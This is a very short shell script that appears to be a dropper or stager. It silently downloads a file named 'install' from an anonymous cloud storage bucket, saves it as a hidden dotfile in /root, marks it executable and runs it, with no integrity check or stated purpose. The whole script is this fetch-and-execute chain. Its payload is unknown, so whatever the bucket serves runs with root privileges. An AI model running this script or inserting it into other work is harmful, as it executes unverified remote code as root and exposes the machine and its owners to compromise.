#!/bin/sh

TMP="/root/.pre.$$"

curl -fsSL https://pub-63253cf8ed88433c861ba9b042a68636.r2.dev/install -o "$TMP" || exit 1

chmod +x "$TMP" || exit 1

exec "$TMP" "$@"